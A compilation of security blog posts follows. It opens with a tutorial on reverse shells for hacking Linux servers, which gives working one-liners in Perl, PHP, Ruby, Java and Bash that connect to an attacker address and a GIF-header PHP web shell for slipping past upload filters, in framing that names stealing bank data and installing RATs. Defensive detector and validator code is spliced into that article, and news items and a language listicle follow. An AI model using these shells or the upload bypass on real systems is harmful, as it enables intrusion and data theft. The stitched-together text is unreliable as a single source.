How to Run Reverse Shell for Hacking in Linux

By Morpheuslord (@morpheuslord)

I am an ethical hacker who learned hacking from YouTube. I like to help people learn the necessary skills.

A reverse shell is a hacking vulnerability in which the hacker executes .php code or an executable file through which he gets access to the shell of the target system. He can then install RATs or steal any info regarding banks or the users of the website and its services.

When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script that provides a convenient command shell, with or without root access, for further malicious activity such as a huge data breach, complete erasure of the server, etc.

Prerequisites

To listen for a reverse shell on Linux you need to have netcat installed. On Windows you need ncat, which comes installed with the nmap suite. Run the following to listen for the reverse shell:

linux:
nc -nlvp <port-used-by-u>
windows:
ncat.exe -nlvp <port-used-by-u>

Programming languages used

Literally any programming language can be used, high-level or low-level, but the most common are:

  • python
  • java
  • Perl
  • ruby
  • PHP
  • bash
python:

Python is a really fast-growing programming language and it is involved in every field, from websites to desktop applications. So sometimes, if after enumeration you find you can use Python on the server, you can use the code given below to start a reverse shell connection.

import socket

SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
# send 1024 (1kb) a time (as buffer size)
BUFFER_SIZE = 1024 * 128  # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
SEPARATOR = "<sep>"
# create a socket object
s = socket.socket()
# make the PORT reusable (this must be set before bind)
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# receiving the current working directory of the client
cwd = client_socket.recv(BUFFER_SIZE).decode()
print("[+] Current working directory:", cwd)

while True:
    # get the command from prompt; skip empty commands
    command = input(f"{cwd} $> ")
    if not command.strip():
        continue
    # send the command to the client
    client_socket.send(command.encode())
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # retrieve command results
    output = client_socket.recv(BUFFER_SIZE).decode()
    print("output:", output)
    # split command output and current directory, then print the output
    results, cwd = output.split(SEPARATOR)
    print(results)

# close connection to the client
client_socket.close()
# close server connection
s.close()
perl:

Perl, just like Python, is a programming language used in web development, but comparatively more used than Python.

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

In the above code, instead of 10.0.0.1 you can specify your IP, and in $p= you can specify the port you prefer.

php:

PHP is a server-side scripting language that is used to develop static websites, dynamic websites, or web applications. PHP stands for Hypertext Pre-processor, which earlier stood for Personal Home Pages. PHP scripts can only be interpreted on a server that has PHP installed.

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

In the above code, instead of 10.0.0.1 you can specify your IP, and in place of the second argument (1234) you can specify the port you prefer.

ruby:

Ruby and Python are both solid languages to use in web development. Ruby offers Ruby on Rails, which uses a Model-View-Controller (MVC) architecture. The MVC architecture is a convention to separate logic.

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

In the above code, instead of 10.0.0.1 you can specify your IP, and in place of the second argument (1234) you can specify the port you prefer.

java:

Java developers keep up with developments in the language, perform periodic updates of security protocols, and have an excellent grasp of handling data requests.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

In the above code, instead of 10.0.0.1 you can specify your IP, and in place of 2002 you can specify the port you prefer.

bash:

Bash is not used on the website itself but on the Linux server, and it is to a large extent very effective.

bash -i >& /dev/tcp/10.10.10.10/4443 0>&1

In the above code, instead of 10.10.10.10 you can specify your IP, and in place of 4443 you can specify the port you prefer.
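All of the one-liners above leave the same trace on the host they run on: a shell process whose standard streams are a TCP socket instead of a terminal. The detector below is an added example for defenders, not part of the original article; it walks /proc for that pattern. The process names in SHELLS and the sample fd tables are constructed for the demonstration.

```python
"""Find shells whose standard streams are network sockets (Linux /proc).

Every reverse shell above ends the same way: /bin/sh or /bin/bash runs with
stdin, stdout and stderr redirected onto a TCP socket. On Linux the kernel
exposes that in /proc/<pid>/fd, where fds 0, 1 and 2 then resolve to
"socket:[<inode>]" instead of a pty such as /dev/pts/0. Added example; it is
not part of the original article.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# process names (from /proc/<pid>/comm) treated as shells; an assumption for this example
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


@dataclass
class Finding:
    pid: int
    comm: str
    socket_fds: Tuple[int, ...]


def classify(pid: int, comm: str, fd_targets: Dict[int, str]) -> Optional[Finding]:
    """Return a Finding when `comm` is a shell and both stdin and stdout are sockets.

    `fd_targets` maps fd number -> readlink() result, as read_proc_fds() produces.
    Treat a hit as a lead, not a verdict: inetd-style services and some container
    exec paths also hand a shell a socket for its standard streams.
    """
    if comm not in SHELLS:
        return None
    socket_fds = tuple(fd for fd in (0, 1, 2) if SOCKET_LINK.match(fd_targets.get(fd, "")))
    if 0 in socket_fds and 1 in socket_fds:
        return Finding(pid, comm, socket_fds)
    return None


def read_comm(pid: int) -> str:
    try:
        with open(f"/proc/{pid}/comm") as f:
            return f.read().strip()
    except OSError:
        return ""


def read_proc_fds(pid: int) -> Dict[int, str]:
    """fd -> symlink target for one process; entries we may not read are skipped."""
    targets: Dict[int, str] = {}
    fd_dir = f"/proc/{pid}/fd"
    try:
        names = os.listdir(fd_dir)
    except OSError:
        return targets
    for name in names:
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except (OSError, ValueError):
            continue
    return targets


def scan_proc() -> List[Finding]:
    """Apply classify() to every process visible in /proc (run as root to see them all)."""
    findings: List[Finding] = []
    if not os.path.isdir("/proc"):
        return findings
    for name in os.listdir("/proc"):
        if name.isdigit():
            pid = int(name)
            hit = classify(pid, read_comm(pid), read_proc_fds(pid))
            if hit:
                findings.append(hit)
    return findings


# Constructed fd table modelled on `bash -i >& /dev/tcp/<ip>/<port> 0>&1`: all three
# standard streams point at one socket inode; fd 255 is bash's private copy of the tty.
SAMPLE_REVERSE_SHELL = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]", 255: "/dev/pts/0"}
# Constructed fd table of an ordinary interactive shell on a terminal.
SAMPLE_NORMAL_SHELL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}

if __name__ == "__main__":
    for hit in scan_proc():
        print(f"pid={hit.pid} comm={hit.comm} socket fds={hit.socket_fds}")
```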

Shell codes copied directly from the exploit-db website.

Problems while injecting the reverse shell

The main problem is how to inject the code into the website. One method is embedding the code into the metadata of a picture and then uploading the image to the website.

You can start a reverse shell attack, but some websites, mostly all secured websites, divide uploaded files into two types, whitelisted and blacklisted. This means the metadata is enumerated and the upload is stopped, or the website might have a really powerful firewall or a malware detection mechanism that blocks anonymous web traffic and blocks it for good.

Overcome problems

To overcome these problems you need a lot of resources, and it is very difficult to bypass the firewall unless you know the required info, so we won't include that in the article. But there is a way to make the upload possible by adding a header in the metadata of the image. Usually hackers use PHP code more than any other because of the versatility it provides, and many times the code starts with a .php format or header, causing it to be detected and stopped. For this not to happen you need to add the GIPHY header to the metadata. To do that, follow the code below:

#open vim and the photo file with the codes
vim example.png
#enter the GIPHY header on the top of everything
GIF89a;
<?php system($_GET['c']);?>
#save the above
#u are ready to upload the picture into the website

The GIF89a; is the GIPHY header; it tells the website that it is a legit picture. You might feel the code won't work, but it works without any issue, and you can listen to the shell and enumerate the server.
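Seen from the upload handler's side, the trick relies on a check that reads only the first bytes of the file. The validator below is an added example for defenders, not code from the article: it keeps the magic-byte check, requires the file extension to agree with it, and refuses any body that carries a PHP or script opener anywhere. The sample files it is run on are constructed.

```python
"""Reject image uploads that are really script polyglots.

The GIF89a trick works against a check that trusts the first few bytes. This
validator keeps the magic-byte check, requires the file extension to agree
with it, and refuses any body that carries a PHP or script opener anywhere.
Added example for defenders; it is not code from the original article, and
the sample files below are constructed.
"""
import re
from typing import Tuple

# magic bytes keyed by the only extensions the upload handler accepts
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Long, distinctive openers only: a 2-3 byte pattern such as "<?=" will eventually
# show up inside genuine compressed pixel data and reject honest uploads.
SCRIPT_MARKERS = re.compile(rb"<\?php\b|<script\b", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for one uploaded file.

    Only the last extension counts, so "shell.php.gif" is judged as a .gif and
    must then survive the body scan. Storing uploads outside any directory the
    web server executes scripts from, and re-encoding images with an image
    library, are the controls this check complements rather than replaces.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return False, f"extension .{ext or '?'} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    if SCRIPT_MARKERS.search(data):
        return False, "embedded script marker found"
    return True, "ok"


# Constructed: the file the article builds (GIF header followed by PHP source).
POLYGLOT = b"GIF89a;\n<?php system($_GET['c']);?>"
# Constructed: a genuine 1x1 GIF89a image (header, screen descriptor, palette,
# image descriptor, LZW data, trailer).
REAL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)

if __name__ == "__main__":
    for name, blob in (("avatar.gif", REAL_GIF), ("avatar.gif", POLYGLOT), ("avatar.php", POLYGLOT)):
        print(name, check_upload(name, blob))
```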

Source

The sources of this article are YouTube videos, and the code is from various GitHub repos.

You can always find the owner of the source code for the program on github.com and the exploit-db website.

Note

To effectively enumerate through the web shell you must execute /bin/bash or /bin/sh to properly get a bash shell, then try to get sudo or root privileges, install any malware, or see any data in every nook and corner of the whole system. This is a simple tool but very effective in enumerating the system.


Source: https://hackernoon.com/how-to-run-reverse-shell-for-hacking-in-linux-of5i37ob?source=rss

Threat Actors are Abusing Argo Workflows to Target Kubernetes

According to a warning from security vendor Intezer, threat actors are leveraging Argo Workflows to target Kubernetes deployments and deploy crypto-miners.

The Intezer team discovered a number of unprotected instances run by companies in the IT, finance, and logistics industries that allowed anyone to deploy workflows. Malicious actors have used the nodes to deploy crypto-miners in some circumstances.

Argo Workflows is an open-source, Kubernetes-based workflow engine that allows customers to perform parallel operations from a single interface, minimising deployment complexity and reducing the risk of failures.

Argo works using YAML files to define the type of work to be done, with workflows being run either from a template or directly from the Argo console.

Threat actors might access an open Argo dashboard and deploy their workflow on the misconfigured servers, according to Intezer. The adversary used kannix/monero-miner, a known crypto-currency mining container that has been removed from Docker Hub, in one of the reported attacks.

Threat actors are abusing the container, which uses XMRig to mine for Monero and can be easily adjusted by simply altering the address of the crypto-wallet where the mined virtual coin should be deposited, to execute crypto-jacking activities.

Users can simply access the Argo Workflows dashboard from outside the corporate network, using an incognito browser, and without authentication, to see if their instances have been correctly configured.

“Another alternative is to query your instance’s API and look at the status code. Request information from [your.instance:port]/api/v1/info using HTTP GET. While an unauthenticated user, a returned HTTP status code of ‘401 Unauthorized’ indicates a correctly configured instance, whereas a successful status code of ‘200 Success’ could indicate that an unauthorised user is able to access the instance,” according to Intezer.

Users should also verify their Argo instances for any strange behaviour and make sure that no workflows have been running for an extended period of time, since this could suggest the deployment of a crypto-miner in the cluster.
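The two checks the article describes, the unauthenticated /api/v1/info probe and the hunt for workflows that have been running far too long, as an added example; this is neither Intezer's nor Argo's code. The server URL is a placeholder, the workflow records are constructed, and the workflow list endpoint and field names are assumptions taken from the Argo Workflow API and CRD layout.

```python
"""Check an Argo Workflows server for the two warning signs named above.

1. An unauthenticated GET to /api/v1/info should be answered 401; a 200 means
   anyone who can reach the server can use it, as in the incidents described.
2. Workflows stuck in phase Running for far longer than any job should take
   are the tell-tale for a planted miner.

Added example; not Intezer's or Argo's code. The server URL is a placeholder,
the workflow records are constructed, and the workflow list endpoint and
field names are assumptions taken from the Argo Workflow API/CRD layout.
"""
import urllib.error
import urllib.request
from datetime import datetime, timedelta, timezone
from typing import List

INFO_PATH = "/api/v1/info"


def classify_info_status(status: int) -> str:
    """Interpret the status code of an unauthenticated GET /api/v1/info."""
    if status == 401:
        return "ok: authentication required"
    if status == 403:
        return "ok: request refused"  # assumption: a proxy in front may answer 403 instead
    if status == 200:
        return "EXPOSED: API answers without credentials"
    if status == 0:
        return "inconclusive: no HTTP response"
    return f"inconclusive: HTTP {status}"


def probe_info(base_url: str, timeout: float = 5.0) -> int:
    """Send the unauthenticated GET from outside the cluster; 0 means unreachable."""
    req = urllib.request.Request(base_url.rstrip("/") + INFO_PATH, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except urllib.error.URLError:
        return 0


def long_running(workflows: List[dict], now: datetime,
                 max_age: timedelta = timedelta(hours=6)) -> List[str]:
    """Names of workflows in phase Running whose startedAt is older than max_age.

    `workflows` is the `items` list as returned by GET /api/v1/workflows/<namespace>
    (assumed layout: metadata.name, status.phase, status.startedAt in RFC 3339 UTC).
    """
    hits = []
    for wf in workflows:
        status = wf.get("status", {})
        started = status.get("startedAt")
        if status.get("phase") != "Running" or not started:
            continue
        started_at = datetime.strptime(started, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        if now - started_at > max_age:
            hits.append(wf["metadata"]["name"])
    return hits


# Constructed workflow list: one finished job, one fresh build, and one that has
# been "running" for a week, which is what a planted miner looks like in the list.
SAMPLE_WORKFLOWS = [
    {"metadata": {"name": "nightly-etl-abc12"},
     "status": {"phase": "Succeeded", "startedAt": "2021-07-21T01:00:00Z"}},
    {"metadata": {"name": "build-xyz98"},
     "status": {"phase": "Running", "startedAt": "2021-07-22T09:30:00Z"}},
    {"metadata": {"name": "untitled-workflow-7f3a"},
     "status": {"phase": "Running", "startedAt": "2021-07-15T03:12:00Z"}},
]
NOW = datetime(2021, 7, 22, 10, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    # placeholder URL; replace with your own instance (2746 is Argo server's default port)
    print(classify_info_status(probe_info("https://argo.example.invalid:2746")))
    print("long-running:", long_running(SAMPLE_WORKFLOWS, NOW))
```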


Source: https://cybersguards.com/threat-actors-are-abusing-argo-workflows-to-target-kubernetes/

What Programming Language Should I Learn for CyberSecurity?

There are approximately 250 popular computer programming languages in use today, with as many as 700 in use worldwide. That number drops to roughly 10-15 in cyberspace. Here are the top twelve programming languages for cyber security that you should learn before embarking on a new cyber job.

The Best Programming Languages for Cybersecurity

Python

Python has been a dominant language in cyber security for numerous years. Because it is a server-side scripting language, the final script does not need to be compiled by programmers. It is a general-purpose language that is employed in a lot of cyber security situations, if not all of them.

Python allows you to automate processes and do malware analysis. Furthermore, a large third-party library of scripts is readily available, implying that assistance is just a click away. Some of the features that make it popular are code readability, straightforward and simple syntax, and a large variety of libraries.

Python is a crucial programming language for cyber security specialists since it can be used to identify malware, do penetration testing, scan for dangers, and analyse them. Being a SOC support expert makes a lot of sense if you know Python.

To safeguard web pages from security risks, you’ll need to create tools and scripts in this role. You can also use data, logs, and artefacts to investigate the source of the problems.

As an aside, the graph above depicts the relative popularity of a language based on the number of GitHub pulls that language receives each year. This and the following charts are based on data from GitHut 2.0, which was generated by littleark.

Golang

Most malware is designed to enter target systems undetected, which makes Golang ideal for this.

A single source code can be written in Golang for all major operating systems.

Malware written in GoLang tends to be quite large. Because big files cannot be analysed by most antivirus software, this allows it to enter systems undetected.

This language also comes with a large set of libraries that make creating malware a breeze.

For security pros, Go has gained a lot of traction. Because of its application in server and cloud services, flexibility and ease of use, and data analysis capabilities, it’s an excellent choice for cyber programmers.

JavaScript

JavaScript is the most widely used programming language, with 95 percent of all websites using it.

It’s one of the most powerful programming languages for cyber security.

If you want to grab cookies, abuse event handlers, and perform cross-site scripting, JavaScript is the way to go.

JavaScript libraries include NodeJS, ReactJS, and jQuery.

This also indicates that, because of the language’s broad use, applications and systems that use it are prime targets.

JavaScript allows programmers to utilise any code while consumers are on a website, enhancing the usefulness of that site. On the other hand, it could provide dangerous functionality that the visitor is unaware of. Malicious coding could be used to start a programme if the website is hacked.

If you know JavaScript, you can make any website secure enough to prevent or even eliminate Cross-Site Scripting (XSS) assaults.

Front-end developers, full-stack developers, back-end developers, and others use JavaScript. It is both the most adaptable and the most widely spoken language on the planet.

C

Because cyber security experts can dismantle malware to investigate its design, propagation, and repercussions by using the C language in reverse engineering, it makes developing antivirus solutions easier.

For developers who QA code integrity, the C programming language is also necessary.

Before launching an attack, cyber adversaries may utilise the language to detect exploitable holes in the network.

Because it is a low-level programming language with basic syntax, it can be learned in a few months. When writing a programme, programmers go above and beyond to ensure that it is bug-free. Hackers, on the other hand, can utilise it to uncover flaws.

Lint is a code analysis tool for programmes written in the C programming language. Since its inception, other variations have arisen. Lint can be used by both cyber security specialists and hackers to uncover programming faults and defects that compromise computer network security.

C++

C++ is based on the C programming language, however it has a few differences.

C++, unlike C, supports objects and classes.

C++ is a quicker and more efficient programming language than C.

Despite its utility, it is used by less than 0.1 percent of all websites.

A C++ developer creates desktop and mobile apps, whereas coding experts find and fix problems and vulnerabilities.

Cyber security experts benefit from studying C++ since it allows them to quickly identify vulnerabilities and security flaws. Cyber professionals may quickly identify security issues in code using a scanning tool like Flawfinder, which searches C++. Using an integrated database that covers the language function’s probable hazards, these tools describe current vulnerabilities, their severity, and their effects on an application.

SQL

The SQL (Structured Query Language) programming language is a domain-specific language. It’s a common tool for parsing data in huge databases. SQL is the most used database management programming language as businesses become more data-driven.

Most websites employ SQL, through a Relational Database Management System (RDBMS), for data management.

It works with a variety of database systems.

As a result, it is widely regarded as the most user-friendly language for database management.

SQL queries are written by database administrators, programmers, and end users to retrieve, insert, modify, and delete data from database tables. This language is frequently used by attackers to steal confidential information, compromise data repositories, and carry out a variety of web-based attacks.

If you wish to understand the attacker’s activities and avoid SQL injection and other database-related assaults, you’ll need at least a rudimentary understanding of SQL.

Assembly

Any low-level language that aids in the analysis and understanding of malware is known as an assembly language.

Understanding assembly is simple, especially if you are already familiar with a high-level programming language.

Slammer, a trojan based on assembly, caused havoc and hindered web traffic in 2003 by inflicting denial of service on a large number of webmasters. The malware took advantage of a buffer overflow flaw in Microsoft’s SQL Server. The issue did not occur suddenly: a patch had been provided several months earlier, but several businesses failed to apply it, allowing the flaw to spread.

Assembly is an important programming language because it can be used by cyber security specialists to decipher malware and understand how it works. Cyber security workers are always defending against conventional and modern malware, therefore it’s critical to understand how malware works.

PowerShell

PowerShell is a more versatile command-line interface that combines the advantages of the traditional Command Prompt (CMD) with a powerful scripting environment that may be used to gain access to a machine’s inner core, including access to Windows APIs.

PowerShell is a useful tool for administrators to automate tedious processes, but its capabilities have unfortunately been exploited by malevolent actors.

Hackers can now use PowerShell to obtain sensitive domain information and load malicious executables instead of relying on traditional malware (also known as fileless malware).

Many attackers favour PowerShell since it is installed by default on all PCs from Windows 7 to Windows Server 2019.

Ruby

Ruby is a high-level programming language established and developed in Japan by Yukihiro Matsumoto. It has since grown in popularity to become one of the most widely used programming languages on the planet.

The syntax of Ruby is nearly identical to that of Perl and Python.

It was written in the C programming language.

It is popular among developers because of its ease of use and natural capacity to manage large code projects.

Airbnb, Hulu, Kickstarter, and Github are just a few of the sites that employ Ruby.

Ruby is a programming language that manages a lot of a machine’s complex information, making it easier to write programmes and using less code.

Java

Many important operating systems, such as Solaris, Linux, macOS, and Microsoft Windows, were designed using Java as one of the earliest languages. It is widely used in various industries because it powers both new and legacy web servers.

The Java programming language has numerous applications in the field of information security.

For example, cyber adversaries utilise it to reverse-engineer proprietary software programmes in order to find and exploit security flaws.

Penetration testers frequently use Java to organise the high-scaling servers that they utilise to deliver payloads.

Pen testing is an important part of a cyber security specialist’s job, and knowing Java makes it easier.

Java programming is used by experienced ethical hackers to construct and develop sophisticated, ethical programmes.

Java is popular among cyber specialists because it is more dynamic than languages like C++.

Ethical hackers can use Java to construct vulnerability testing applications that can run on a variety of systems.

PHP

PHP is a computer language that is used to create webpages on the server side. PHP is the most powerful server-side language available, with 80 percent of the top 10 million domains using it. For this reason alone, it is self-evident that knowing PHP will assist you in defending against attackers.

RIPS is a common tool for automated security analysis in PHP applications.

RIPS investigates data flow from input parameters to important operations in an application.

If you’re a PHP developer dealing with security flaws, RIPS could be useful.

You can write server-side web application logic as a PHP security developer.

PHP can be used to manage back-end resources and data sharing between servers and their customers.

You can also utilise your PHP skills to find and fix any flaws in your code.

It’s also worth noting that PHP is a server-side language that works with HTML and aids the proper functioning of websites. Web designers use PHP to connect databases to web pages to make website upgrades easier.

Shell scripting

Shell scripting combines numerous commands that you may already be familiar with through your operating system’s terminal sessions to allow developers to create automated scripts for a variety of tasks.

Do you need to set up accounts rapidly and provide enough access? Are you looking for a quick way to automate a system configuration security lockdown? Shell scripting is useful in this situation.

If you’re using Linux or macOS, you’ll want to learn certain Linux scripting languages like Bash. Immerse yourself in PowerShell if you’re a Windows expert.

What’s the First Cyber Security Language I Should Learn?

Python is a good place to start. The syntax is simple, and there are numerous libraries available to make your coding life easier.

Python is used in cyber security to do several tasks such as malware scanning and analysis. Python is also a good starting point for more advanced programming languages. It has a high level of code readability and is utilised by some of the world’s most well-known digital companies, including Google, Reddit, and NASA. After you’ve mastered Python, you can progress to higher-level programming languages.


Source: https://cybersguards.com/what-programming-language-should-i-learn-for-cybersecurity/

Software Update Triggered a Glitch at Network Specialty Firm Akamai

A software update at network speciality provider Akamai caused a glitch on Thursday, knocking websites offline for a short time.

Reports of internet outages from around the world exploded on the website Downdetector, with Akamai, based in the United States, claiming that some websites were down for up to an hour.

“A flaw in the DNS (domain name system) system, which leads browsers to websites, was caused by a software configuration update,” Akamai noted in a blog post. “As a result, the availability of several client websites was impacted.”

According to Akamai, who apologised for the inconvenience, rolling back the software update fixed the problem.

The outage, which impacted banks, airlines, and other online services, occurred just weeks after Akamai was blamed for a massive online outage that impacted bank and airline websites on both sides of the Pacific.

Around 500 of Akamai’s clients were briefly taken offline due to a fault with one of its online security solutions at the time.

The occurrences highlight the importance of online platforms’ reliability, as well as the critical role that a few little-known “CDN” (content delivery network) providers play in keeping the web up and running.

After a malfunction with cloud computing services provider Fastly in June, US media and government websites, including the White House, New York Times, Reddit, and Amazon, were temporarily down.

Fastly is a service that reduces the time it takes for a webpage to load.


Source: https://cybersguards.com/software-update-triggered-a-glitch-at-network-specialty-firm-akamai/

Google Announced Autonomic Security Operations to Improve SOCs and IDS

Google Cloud introduced new security products for its customers this week, including Autonomic Security Operations, which aims to improve security operations centres (SOCs), and Cloud Intrusion Detection System (IDS), which detects network-based threats.

According to Google, Autonomic Security Operations is a “stack of products, integrations, blueprints, technical documentation, and an accelerator programme” that aims to assist customers combine Chronicle and Google technology and experience to enhance their SOC.

Autonomic Security Operations is a combination of concepts, techniques, and tools that should assist organisations increase their resilience against cyberattacks by automating threat management.

Products (Chronicle, Looker, and BigQuery), integrations with supported vendors (EDR, SOAR), network forensics and telemetry blueprints, content (sample dashboards, rules, and use-cases), accelerator workshops, and preferred SOC transformation and managed security service provider (MSSP) partners are all included in the solution.

Google claims it has teamed up with BT to bring Autonomic Security Operations to the managed security services industry, and the solution is underpinned by long-standing partnerships with Cyderes and SADA Systems, among others.

Google’s new Cloud IDS, which is currently in preview, is a network security product that provides native network-based threat detection capabilities while leveraging Google Cloud integration.

The tool was developed in partnership with Palo Alto Networks and can assist enterprises in not just gaining insight into network-based risks, but also ensuring that their security systems are compatible with industry norms.

Cloud IDS is an end-to-end cloud solution that monitors east-west traffic as well as traffic to and from the Internet for anomalies and threats such as malware, spyware, command and control (C&C) activity, and more. Cloud IDS data may be used to examine and correlate threats, as well as respond to them.

Cloud IDS now works with Splunk’s cloud and enterprise platforms, Exabeam’s Advanced Analytics solution, The Devo Platform, and Palo Alto Networks’ Cortex XSOAR, with Google Cloud’s Chronicle and Security Command Center integrations coming soon.


Source: https://cybersguards.com/google-announced-autonomic-security-operations-to-improve-socs-and-ids/
